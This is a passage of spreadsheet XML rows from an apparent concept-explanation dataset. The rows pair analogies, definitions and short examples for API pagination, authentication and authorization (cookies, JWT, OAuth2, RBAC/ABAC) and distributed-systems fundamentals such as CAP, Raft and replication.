        </is>
      </c>
      <c r="E840" t="inlineStr">
        <is>
          <t>Pages via LIMIT/OFFSET (page=3&amp;size=20): simple and jumpable, but O(offset) scan cost and rows shift when data changes mid-scroll.</t>
        </is>
      </c>
      <c r="F840" t="inlineStr">
        <is>
          <t>GET /items?offset=100&amp;limit=20 maps to SQL ORDER BY id LIMIT 20 OFFSET 100 (rescans 100 rows)</t>
        </is>
      </c>
      <c r="G840" t="inlineStr">
        <is>
          <t>Cursor pagination — 'after this key' is stable and indexed, but you can't jump straight to page 47.</t>
        </is>
      </c>
      <c r="H840" t="inlineStr">
        <is>
          <t>Bookmarking by page number in a growing book</t>
        </is>
      </c>
      <c r="J840" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K840" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" t="n">
        <v>0</v>
      </c>
      <c r="B841" t="inlineStr">
        <is>
          <t>839</t>
        </is>
      </c>
      <c r="C841" t="inlineStr">
        <is>
          <t>Cursor pagination</t>
        </is>
      </c>
      <c r="D841" t="inlineStr">
        <is>
          <t>A steel bookmark clipped to the exact sentence, not the page number: strangers can staple in new pages all night, your clip still points at your sentence.</t>
        </is>
      </c>
      <c r="E841" t="inlineStr">
        <is>
          <t>The response returns an opaque cursor marking the last item; the next request continues after it — stable under inserts, indexed lookup.</t>
        </is>
      </c>
      <c r="F841" t="inlineStr">
        <is>
          <t>GET /items?after=eyJpZCI6OTh9 returns {items:[...], next_cursor:...}; SQL WHERE id &gt; 98 LIMIT 20</t>
        </is>
      </c>
      <c r="G841" t="inlineStr">
        <is>
          <t>Offset pagination — allows random page jumps but drifts and slows on deep pages; cursors trade jumping for stability.</t>
        </is>
      </c>
      <c r="H841" t="inlineStr">
        <is>
          <t>Trail of breadcrumbs from your last step</t>
        </is>
      </c>
      <c r="J841" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K841" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" t="n">
        <v>0</v>
      </c>
      <c r="B842" t="inlineStr">
        <is>
          <t>840</t>
        </is>
      </c>
      <c r="C842" t="inlineStr">
        <is>
          <t>Authentication vs authorization</t>
        </is>
      </c>
      <c r="D842" t="inlineStr">
        <is>
          <t>A nightclub: the bouncer at the door checks your ID photo (authN); inside, a velvet rope still blocks you from the VIP loft (authZ).</t>
        </is>
      </c>
      <c r="E842" t="inlineStr">
        <is>
          <t>Authentication proves who you are; authorization decides what you may do — 401 challenges identity, 403 denies permission.</t>
        </is>
      </c>
      <c r="F842" t="inlineStr">
        <is>
          <t>Login succeeds (authN) but GET /admin returns 403 (authZ): known user, insufficient rights</t>
        </is>
      </c>
      <c r="G842" t="inlineStr">
        <is>
          <t>401 vs 403 — 401 says 'prove who you are'; 403 says 'we know you, and no'.</t>
        </is>
      </c>
      <c r="H842" t="inlineStr">
        <is>
          <t>Passport vs visa stamps</t>
        </is>
      </c>
      <c r="J842" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K842" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" t="n">
        <v>0</v>
      </c>
      <c r="B843" t="inlineStr">
        <is>
          <t>841</t>
        </is>
      </c>
      <c r="C843" t="inlineStr">
        <is>
          <t>Sessions &amp; cookies</t>
        </is>
      </c>
      <c r="D843" t="inlineStr">
        <is>
          <t>A coat-check token: the clerk keeps your coat (state) in the back room; you carry only a numbered brass chip that the doorman glimpses on each pass.</t>
        </is>
      </c>
      <c r="E843" t="inlineStr">
        <is>
          <t>The server stores login state under a random session ID and hands it to the browser as a cookie, auto-sent on every same-site request.</t>
        </is>
      </c>
      <c r="F843" t="inlineStr">
        <is>
          <t>Set-Cookie: sid=a1b2c3; server looks up sessions[a1b2c3] = {user: 7}; logout deletes the server entry</t>
        </is>
      </c>
      <c r="G843" t="inlineStr">
        <is>
          <t>JWT — the state travels inside the token itself; a session ID is a mere pointer to server memory, instantly revocable.</t>
        </is>
      </c>
      <c r="H843" t="inlineStr">
        <is>
          <t>Hospital wristband</t>
        </is>
      </c>
      <c r="J843" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K843" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" t="n">
        <v>0</v>
      </c>
      <c r="B844" t="inlineStr">
        <is>
          <t>842</t>
        </is>
      </c>
      <c r="C844" t="inlineStr">
        <is>
          <t>Cookie security flags</t>
        </is>
      </c>
      <c r="D844" t="inlineStr">
        <is>
          <t>Three padlocks on the brass chip: a blindfold so page scripts can't read it (HttpOnly), armored-car-only transport (Secure), and 'no forwarding to other buildings' (SameSite).</t>
        </is>
      </c>
      <c r="E844" t="inlineStr">
        <is>
          <t>HttpOnly hides a cookie from JavaScript, Secure restricts it to HTTPS, and SameSite limits cross-site sending (CSRF defense).</t>
        </is>
      </c>
      <c r="F844" t="inlineStr">
        <is>
          <t>Set-Cookie: sid=...; HttpOnly; Secure; SameSite=Lax — XSS can't read it, plain HTTP can't leak it</t>
        </is>
      </c>
      <c r="G844" t="inlineStr">
        <is>
          <t>Secure flag vs HTTPS-only site — the flag guards the cookie even if one HTTP link slips in; site policy alone doesn't.</t>
        </is>
      </c>
      <c r="H844" t="inlineStr">
        <is>
          <t>Diplomatic pouch rules</t>
        </is>
      </c>
      <c r="J844" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K844" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" t="n">
        <v>0</v>
      </c>
      <c r="B845" t="inlineStr">
        <is>
          <t>843</t>
        </is>
      </c>
      <c r="C845" t="inlineStr">
        <is>
          <t>JWT anatomy</t>
        </is>
      </c>
      <c r="D845" t="inlineStr">
        <is>
          <t>A see-through glass ticket with claims etched inside and a wax seal on the corner: anyone can read it through the glass, but only the mint's seal makes it valid.</t>
        </is>
      </c>
      <c r="E845" t="inlineStr">
        <is>
          <t>A JWT is three base64url parts — header.payload.signature — with claims in the payload: readable by anyone, forgeable by no one.</t>
        </is>
      </c>
      <c r="F845" t="inlineStr">
        <is>
          <t>eyJhbGciOi...payload...signature — decode at jwt.io: {sub:'7', role:'admin', exp:1740000000}</t>
        </is>
      </c>
      <c r="G845" t="inlineStr">
        <is>
          <t>Encryption — JWTs are signed, not secret; base64 is mere encoding, so never put passwords in claims.</t>
        </is>
      </c>
      <c r="H845" t="inlineStr">
        <is>
          <t>Notarized postcard</t>
        </is>
      </c>
      <c r="J845" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K845" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" t="n">
        <v>0</v>
      </c>
      <c r="B846" t="inlineStr">
        <is>
          <t>844</t>
        </is>
      </c>
      <c r="C846" t="inlineStr">
        <is>
          <t>JWT revocation problem</t>
        </is>
      </c>
      <c r="D846" t="inlineStr">
        <is>
          <t>Firing an employee who holds a tamper-proof badge that doors trust without phoning HR: until the badge's printed date expires, every door still swings open for him.</t>
        </is>
      </c>
      <c r="E846" t="inlineStr">
        <is>
          <t>Stateless JWTs verify by signature alone, so a stolen or logged-out token stays valid until exp — revocation needs a denylist or short TTLs.</t>
        </is>
      </c>
      <c r="F846" t="inlineStr">
        <is>
          <t>Mitigation: 5-minute access tokens plus a refresh token that IS checked server-side; or a token denylist</t>
        </is>
      </c>
      <c r="G846" t="inlineStr">
        <is>
          <t>Session IDs — delete the server row and access dies instantly; JWTs traded that kill switch for statelessness.</t>
        </is>
      </c>
      <c r="H846" t="inlineStr">
        <is>
          <t>Recalling coupons already mailed out</t>
        </is>
      </c>
      <c r="J846" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K846" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" t="n">
        <v>0</v>
      </c>
      <c r="B847" t="inlineStr">
        <is>
          <t>845</t>
        </is>
      </c>
      <c r="C847" t="inlineStr">
        <is>
          <t>OAuth2 authorization-code flow</t>
        </is>
      </c>
      <c r="D847" t="inlineStr">
        <is>
          <t>A valet triangle: you never hand the app your house keys — the provider gives it a single-use claim ticket (code), which its back office trades for a scoped valet key (token).</t>
        </is>
      </c>
      <c r="E847" t="inlineStr">
        <is>
          <t>The app redirects you to the provider to consent; a one-time code returns via redirect and is exchanged server-side (with PKCE) for tokens.</t>
        </is>
      </c>
      <c r="F847" t="inlineStr">
        <is>
          <t>GET /authorize?client_id&amp;redirect_uri&amp;code_challenge then ?code=xyz then POST /token {code, verifier} yields access_token</t>
        </is>
      </c>
      <c r="G847" t="inlineStr">
        <is>
          <t>OpenID Connect — the identity layer on top: OAuth answers 'may this app act?', OIDC answers 'who is this user?' (id_token).</t>
        </is>
      </c>
      <c r="H847" t="inlineStr">
        <is>
          <t>Hotel front desk issuing room keycards</t>
        </is>
      </c>
      <c r="J847" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K847" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" t="n">
        <v>0</v>
      </c>
      <c r="B848" t="inlineStr">
        <is>
          <t>846</t>
        </is>
      </c>
      <c r="C848" t="inlineStr">
        <is>
          <t>Refresh tokens</t>
        </is>
      </c>
      <c r="D848" t="inlineStr">
        <is>
          <t>A season pass locked in the box-office safe that prints day tickets: lose a day ticket, small harm; cancel the pass and the printing stops cold.</t>
        </is>
      </c>
      <c r="E848" t="inlineStr">
        <is>
          <t>A long-lived, server-checked token exchanged for fresh short-lived access tokens, keeping access revocable without constant re-login.</t>
        </is>
      </c>
      <c r="F848" t="inlineStr">
        <is>
          <t>access_token expires in 5m; POST /token {grant_type:refresh_token} returns a new pair; rotation detects theft</t>
        </is>
      </c>
      <c r="G848" t="inlineStr">
        <is>
          <t>Access token — the short-lived bearer shown to APIs; the refresh token only ever talks to the auth server.</t>
        </is>
      </c>
      <c r="H848" t="inlineStr">
        <is>
          <t>Sourdough starter regrowing loaves</t>
        </is>
      </c>
      <c r="J848" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K848" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" t="n">
        <v>0</v>
      </c>
      <c r="B849" t="inlineStr">
        <is>
          <t>847</t>
        </is>
      </c>
      <c r="C849" t="inlineStr">
        <is>
          <t>API keys</t>
        </is>
      </c>
      <c r="D849" t="inlineStr">
        <is>
          <t>A factory gate with one rubber-stamped hall pass photocopied for the whole vendor company — the guard knows the company, never the person.</t>
        </is>
      </c>
      <c r="E849" t="inlineStr">
        <is>
          <t>A static secret string identifying the calling app, sent in a header; simple to issue and rate-limit, but no user identity and painful to rotate.</t>
        </is>
      </c>
      <c r="F849" t="inlineStr">
        <is>
          <t>curl -H 'X-Api-Key: sk_live_51H...' https://api.example.com/v1/charges — scope is the app, not a user</t>
        </is>
      </c>
      <c r="G849" t="inlineStr">
        <is>
          <t>OAuth tokens — scoped, expiring, user-delegated; an API key is a durable app-level password.</t>
        </is>
      </c>
      <c r="H849" t="inlineStr">
        <is>
          <t>Locker combination shared by a team</t>
        </is>
      </c>
      <c r="J849" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K849" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" t="n">
        <v>0</v>
      </c>
      <c r="B850" t="inlineStr">
        <is>
          <t>848</t>
        </is>
      </c>
      <c r="C850" t="inlineStr">
        <is>
          <t>RBAC</t>
        </is>
      </c>
      <c r="D850" t="inlineStr">
        <is>
          <t>Colored hard hats at a construction site: white hats enter the office, yellow hats ride machines; the guard checks hat color, never your biography.</t>
        </is>
      </c>
      <c r="E850" t="inlineStr">
        <is>
          <t>Permissions attach to roles (admin, editor, viewer) and users receive roles — authorization by job title: coarse but auditable.</t>
        </is>
      </c>
      <c r="F850" t="inlineStr">
        <is>
          <t>role editor = {post:create, post:edit}; alice.roles = [editor]; can alice delete users? no such role, deny</t>
        </is>
      </c>
      <c r="G850" t="inlineStr">
        <is>
          <t>ABAC — evaluates attributes and context per request; RBAC only asks which hat you wear.</t>
        </is>
      </c>
      <c r="H850" t="inlineStr">
        <is>
          <t>Military rank insignia</t>
        </is>
      </c>
      <c r="J850" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K850" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" t="n">
        <v>0</v>
      </c>
      <c r="B851" t="inlineStr">
        <is>
          <t>849</t>
        </is>
      </c>
      <c r="C851" t="inlineStr">
        <is>
          <t>ABAC</t>
        </is>
      </c>
      <c r="D851" t="inlineStr">
        <is>
          <t>A shape-shifting door that reads your badge, the folder's tags, and the wall clock all at once — it opens for the night nurse at 3am but refuses her at noon.</t>
        </is>
      </c>
      <c r="E851" t="inlineStr">
        <is>
          <t>Access decided by policies over attributes of user, resource, and context — 'doctors may read records of patients in their own ward, on shift'.</t>
        </is>
      </c>
      <c r="F851" t="inlineStr">
        <is>
          <t>allow if user.dept == doc.dept and doc.level &lt;= user.clearance and time in work_hours</t>
        </is>
      </c>
      <c r="G851" t="inlineStr">
        <is>
          <t>RBAC — static role buckets; ABAC composes fine-grained runtime conditions at the cost of policy complexity.</t>
        </is>
      </c>
      <c r="H851" t="inlineStr">
        <is>
          <t>Airport security lane rules matrix</t>
        </is>
      </c>
      <c r="J851" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K851" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" t="n">
        <v>0</v>
      </c>
      <c r="B852" t="inlineStr">
        <is>
          <t>850</t>
        </is>
      </c>
      <c r="C852" t="inlineStr">
        <is>
          <t>Partial failure</t>
        </is>
      </c>
      <c r="D852" t="inlineStr">
        <is>
          <t>Shouting orders across a foggy harbor: some boats answer, some sank, some are merely slow — and the fog never tells you which.</t>
        </is>
      </c>
      <c r="E852" t="inlineStr">
        <is>
          <t>In a distributed system some parts fail while others work — and a hung remote call is indistinguishable from a slow one or a lost reply.</t>
        </is>
      </c>
      <c r="F852" t="inlineStr">
        <is>
          <t>A call times out: did the payment fail, or succeed with the ACK lost? Both remain possible</t>
        </is>
      </c>
      <c r="G852" t="inlineStr">
        <is>
          <t>Total failure — a single machine crashing whole is painful but simple; partial failure creates ambiguous mixed states.</t>
        </is>
      </c>
      <c r="H852" t="inlineStr">
        <is>
          <t>String of Christmas lights half-lit</t>
        </is>
      </c>
      <c r="J852" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K852" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" t="n">
        <v>0</v>
      </c>
      <c r="B853" t="inlineStr">
        <is>
          <t>851</t>
        </is>
      </c>
      <c r="C853" t="inlineStr">
        <is>
          <t>Fallacies of distributed computing</t>
        </is>
      </c>
      <c r="D853" t="inlineStr">
        <is>
          <t>Eight smiling gremlins each holding a cue card of a lie ('the network never drops!'); production is the stage where each card catches fire in turn.</t>
        </is>
      </c>
      <c r="E853" t="inlineStr">
        <is>
          <t>Eight false assumptions: the network is reliable, latency zero, bandwidth infinite, topology stable, one admin, transport free, secure, homogeneous.</t>
        </is>
      </c>
      <c r="F853" t="inlineStr">
        <is>
          <t>Code assuming a service call is as safe as a local call breaks first on fallacy #1: the network is reliable</t>
        </is>
      </c>
      <c r="G853" t="inlineStr">
        <is>
          <t>CAP theorem — one precise proven trade-off; the fallacies are a checklist of naive beliefs.</t>
        </is>
      </c>
      <c r="H853" t="inlineStr">
        <is>
          <t>Eight-sided loaded die</t>
        </is>
      </c>
      <c r="J853" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K853" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" t="n">
        <v>0</v>
      </c>
      <c r="B854" t="inlineStr">
        <is>
          <t>852</t>
        </is>
      </c>
      <c r="C854" t="inlineStr">
        <is>
          <t>CAP theorem</t>
        </is>
      </c>
      <c r="D854" t="inlineStr">
        <is>
          <t>Two bank branches with the phone line cut: freeze withdrawals until the line returns (C) or hand out cash and reconcile later (A). The cut line (P) chose itself.</t>
        </is>
      </c>
      <c r="E854" t="inlineStr">
        <is>
          <t>During a network partition you must choose consistency (refuse or block) or availability (answer, possibly stale) — P itself is not optional.</t>
        </is>
      </c>
      <c r="F854" t="inlineStr">
        <is>
          <t>Partition hits: a CP system errors on the minority side; an AP system serves possibly-stale reads</t>
        </is>
      </c>
      <c r="G854" t="inlineStr">
        <is>
          <t>'Pick 2 of 3' myth — you can't drop P; the real choice is C-versus-A only while partitioned.</t>
        </is>
      </c>
      <c r="H854" t="inlineStr">
        <is>
          <t>Seesaw with a storm at the pivot</t>
        </is>
      </c>
      <c r="J854" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K854" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" t="n">
        <v>0</v>
      </c>
      <c r="B855" t="inlineStr">
        <is>
          <t>853</t>
        </is>
      </c>
      <c r="C855" t="inlineStr">
        <is>
          <t>Lamport logical clocks</t>
        </is>
      </c>
      <c r="D855" t="inlineStr">
        <is>
          <t>Gossiping villagers each carrying a click-counter: on hearing news you click past the teller's count — nobody owns a watch, yet the stories still sort.</t>
        </is>
      </c>
      <c r="E855" t="inlineStr">
        <is>
          <t>A counter incremented per event and maxed on message receipt orders events consistently with causality — happens-before without wall clocks.</t>
        </is>
      </c>
      <c r="F855" t="inlineStr">
        <is>
          <t>A sends msg with t=5; B at t=3 receives and jumps to max(3,5)+1=6; if a happens-before b then L(a)&lt;L(b)</t>
        </is>
      </c>
      <c r="G855" t="inlineStr">
        <is>
          <t>Vector clocks — can detect concurrency (incomparable events); Lamport gives one order but can't tell concurrent apart.</t>
        </is>
      </c>
      <c r="H855" t="inlineStr">
        <is>
          <t>Deli ticket dispenser shared by mail</t>
        </is>
      </c>
      <c r="J855" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K855" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" t="n">
        <v>0</v>
      </c>
      <c r="B856" t="inlineStr">
        <is>
          <t>854</t>
        </is>
      </c>
      <c r="C856" t="inlineStr">
        <is>
          <t>Consensus problem</t>
        </is>
      </c>
      <c r="D856" t="inlineStr">
        <is>
          <t>Five judges in soundproof booths passing notes to pick one winner — notes vanish, judges nap, yet no two may ever announce different winners.</t>
        </is>
      </c>
      <c r="E856" t="inlineStr">
        <is>
          <t>Getting nodes to agree on one value despite crashes and delays; FLP proves no algorithm guarantees it in bounded time asynchronously.</t>
        </is>
      </c>
      <c r="F856" t="inlineStr">
        <is>
          <t>Leader election, transaction commit, log ordering — all reduce to consensus (Raft, Paxos)</t>
        </is>
      </c>
      <c r="G856" t="inlineStr">
        <is>
          <t>Eventual consistency — replicas drift then converge; consensus means agreeing BEFORE acting, never diverging.</t>
        </is>
      </c>
      <c r="H856" t="inlineStr">
        <is>
          <t>Jury deadlock rules</t>
        </is>
      </c>
      <c r="J856" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K856" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" t="n">
        <v>0</v>
      </c>
      <c r="B857" t="inlineStr">
        <is>
          <t>855</t>
        </is>
      </c>
      <c r="C857" t="inlineStr">
        <is>
          <t>Raft leader election</t>
        </is>
      </c>
      <c r="D857" t="inlineStr">
        <is>
          <t>A raft crew whose captain's drumbeat stops: the first rower to wake shouts 'term 8 — vote for me!' and half the oars raised makes a captain.</t>
        </is>
      </c>
      <c r="E857" t="inlineStr">
        <is>
          <t>Followers missing heartbeats become candidates and solicit votes in a new term; a majority makes a leader, and higher terms depose stale ones.</t>
        </is>
      </c>
      <c r="F857" t="inlineStr">
        <is>
          <t>Election timeout randomized 150-300ms to avoid split votes; a candidate needs 3 of 5 votes</t>
        </is>
      </c>
      <c r="G857" t="inlineStr">
        <is>
          <t>Paxos — equivalent guarantees but famously hard to grasp; Raft was designed for understandability with an explicit leader.</t>
        </is>
      </c>
      <c r="H857" t="inlineStr">
        <is>
          <t>Playground game of steal-the-flag</t>
        </is>
      </c>
      <c r="J857" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K857" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" t="n">
        <v>0</v>
      </c>
      <c r="B858" t="inlineStr">
        <is>
          <t>856</t>
        </is>
      </c>
      <c r="C858" t="inlineStr">
        <is>
          <t>Split brain</t>
        </is>
      </c>
      <c r="D858" t="inlineStr">
        <is>
          <t>An orchestra split by a fallen curtain: two conductors now wave batons at half the players each, and the symphony forks into noise.</t>
        </is>
      </c>
      <c r="E858" t="inlineStr">
        <is>
          <t>A partition leaves two nodes each believing they are the sole leader, both accepting writes — prevented by majority quorums and fencing.</t>
        </is>
      </c>
      <c r="F858" t="inlineStr">
        <is>
          <t>A 5-node cluster splits 3/2: the 2-side cannot reach majority and refuses writes — no second leader</t>
        </is>
      </c>
      <c r="G858" t="inlineStr">
        <is>
          <t>Failover — the intended replacement of a dead leader; split brain is two simultaneous leaders corrupting data.</t>
        </is>
      </c>
      <c r="H858" t="inlineStr">
        <is>
          <t>Two kings crowned in one chess game</t>
        </is>
      </c>
      <c r="J858" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K858" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" t="n">
        <v>0</v>
      </c>
      <c r="B859" t="inlineStr">
        <is>
          <t>857</t>
        </is>
      </c>
      <c r="C859" t="inlineStr">
        <is>
          <t>Exactly-once delivery myth</t>
        </is>
      </c>
      <c r="D859" t="inlineStr">
        <is>
          <t>A unicorn stamped 'EXACTLY ONCE' painted on a postal truck: chase it and you find a mule re-delivering parcels (at-least-once) to houses keeping 'already got it' checklists (dedupe).</t>
        </is>
      </c>
      <c r="E859" t="inlineStr">
        <is>
          <t>Over a lossy network you cannot guarantee a message arrives exactly once — you pick at-least-once plus idempotent processing to fake it.</t>
        </is>
      </c>
      <c r="F859" t="inlineStr">
        <is>
          <t>Kafka 'exactly-once' = at-least-once delivery + idempotent producer + transactional offset commits</t>
        </is>
      </c>
      <c r="G859" t="inlineStr">
        <is>
          <t>Exactly-once processing — achievable via dedup and transactions; exactly-once DELIVERY over the wire is not.</t>
        </is>
      </c>
      <c r="H859" t="inlineStr">
        <is>
          <t>Perpetual motion machine of messaging</t>
        </is>
      </c>
      <c r="J859" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K859" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" t="n">
        <v>0</v>
      </c>
      <c r="B860" t="inlineStr">
        <is>
          <t>858</t>
        </is>
      </c>
      <c r="C860" t="inlineStr">
        <is>
          <t>Two Generals problem</t>
        </is>
      </c>
      <c r="D860" t="inlineStr">
        <is>
          <t>Two hilltop generals sending riders through an enemy valley: 'attack at dawn' — 'confirm you got my confirm' — riders vanish, and dawn arrives with no certainty.</t>
        </is>
      </c>
      <c r="E860" t="inlineStr">
        <is>
          <t>Two parties coordinating over a lossy channel can never reach certain agreement — every confirmation itself needs confirming, forever.</t>
        </is>
      </c>
      <c r="F860" t="inlineStr">
        <is>
          <t>TCP handshakes and acks mitigate but cannot solve it; hence timeouts, retries, and idempotency</t>
        </is>
      </c>
      <c r="G860" t="inlineStr">
        <is>
          <t>Byzantine generals — nodes may lie or act maliciously; Two Generals is only lost messages between honest parties.</t>
        </is>
      </c>
      <c r="H860" t="inlineStr">
        <is>
          <t>Infinite 'no, you hang up first' phone call</t>
        </is>
      </c>
      <c r="J860" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K860" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" t="n">
        <v>0</v>
      </c>
      <c r="B861" t="inlineStr">
        <is>
          <t>859</t>
        </is>
      </c>
      <c r="C861" t="inlineStr">
        <is>
          <t>Heartbeats &amp; failure detection</t>
        </is>
      </c>
      <c r="D861" t="inlineStr">
        <is>
          <t>Miners tapping the cave wall every minute: three missed taps and the crew seals the tunnel — sometimes on a miner who had only paused for lunch.</t>
        </is>
      </c>
      <c r="E861" t="inlineStr">
        <is>
          <t>Nodes prove liveness with periodic pings; miss enough and peers declare you dead — but a timeout can't distinguish crashed from slow.</t>
        </is>
      </c>
      <c r="F861" t="inlineStr">
        <is>
          <t>Raft: no heartbeat for 300ms starts an election; k8s liveness probe fails 3x and the container restarts</t>
        </is>
      </c>
      <c r="G861" t="inlineStr">
        <is>
          <t>Health checks — the platform actively asks 'can you serve?'; heartbeats are the node itself announcing 'still alive'.</t>
        </is>
      </c>
      <c r="H861" t="inlineStr">
        <is>
          <t>Hospital EKG monitor flatline</t>
        </is>
      </c>
      <c r="J861" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K861" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" t="n">
        <v>0</v>
      </c>
      <c r="B862" t="inlineStr">
        <is>
          <t>860</t>
        </is>
      </c>
      <c r="C862" t="inlineStr">
        <is>
          <t>Leader-follower replication</t>
        </is>
      </c>
      <c r="D862" t="inlineStr">
        <is>
          <t>A head chef alone allowed to write in the master cookbook; apprentice cooks copy each new page by carbon paper and answer diners' recipe questions.</t>
        </is>
      </c>
      <c r="E862" t="inlineStr">
        <is>
          <t>All writes go to one leader, which streams its change log to followers serving reads — simple, but the leader is the write bottleneck.</t>
        </is>
      </c>
      <c r="F862" t="inlineStr">
        <is>
          <t>Postgres primary plus 2 read replicas via WAL shipping; writes to primary, SELECTs to replicas</t>
        </is>
      </c>
      <c r="G862" t="inlineStr">
        <is>
          <t>Multi-leader — several writers accepting writes and needing conflict resolution; single-leader avoids conflicts by funneling.</t>
        </is>
      </c>
      <c r="H862" t="inlineStr">
        <is>
          <t>Newspaper press and paperboys</t>
        </is>
      </c>
      <c r="J862" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K862" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" t="n">
        <v>0</v>
      </c>
      <c r="B863" t="inlineStr">
        <is>
          <t>861</t>
        </is>
      </c>
      <c r="C863" t="inlineStr">
        <is>
          <t>Sync vs async replication</t>
        </is>
      </c>
      <c r="D863" t="inlineStr">
        <is>
          <t>Dictating a will: the careful notary won't nod until the copyist finishes (sync); the hasty one nods instantly while the copyist trails behind (async) — then the courthouse burns.</t>
        </is>
      </c>
      <c r="E863" t="inlineStr">
        <is>
          <t>Sync waits for follower acknowledgment before confirming a write (no loss, higher latency); async confirms at once and risks losing recent writes.</t>
        </is>
      </c>
      <c r="F863" t="inlineStr">
        <is>
          <t>Postgres synchronous_commit=on waits for standby flush; async failover may lose the last commits</t>
        </is>
      </c>
      <c r="G863" t="inlineStr">
        <is>
          <t>Semi-sync — waits for at least one follower, hedging durability against latency.</t>
        </is>
      </c>
      <c r="H863" t="inlineStr">
        <is>
          <t>Certified vs regular airmail copies</t>
        </is>
      </c>
      <c r="J863" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K863" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" t="n">
        <v>0</v>
      </c>
      <c r="B864" t="inlineStr">
        <is>
          <t>862</t>
        </is>
      </c>
      <c r="C864" t="inlineStr">
        <is>
          <t>Replication lag</t>
        </is>
      </c>
      <c r="D864" t="inlineStr">
        <is>
          <t>A stadium scoreboard on a ten-second delay: fans in the cheap seats cheer a goal the players scored while their own eyes still show 0-0.</t>
        </is>
      </c>
      <c r="E864" t="inlineStr">
        <is>
          <t>Async followers apply the leader's log seconds late, so replica reads can return stale data — eventual, not immediate, consistency.</t>
        </is>
      </c>
      <c r="F864" t="inlineStr">
        <is>
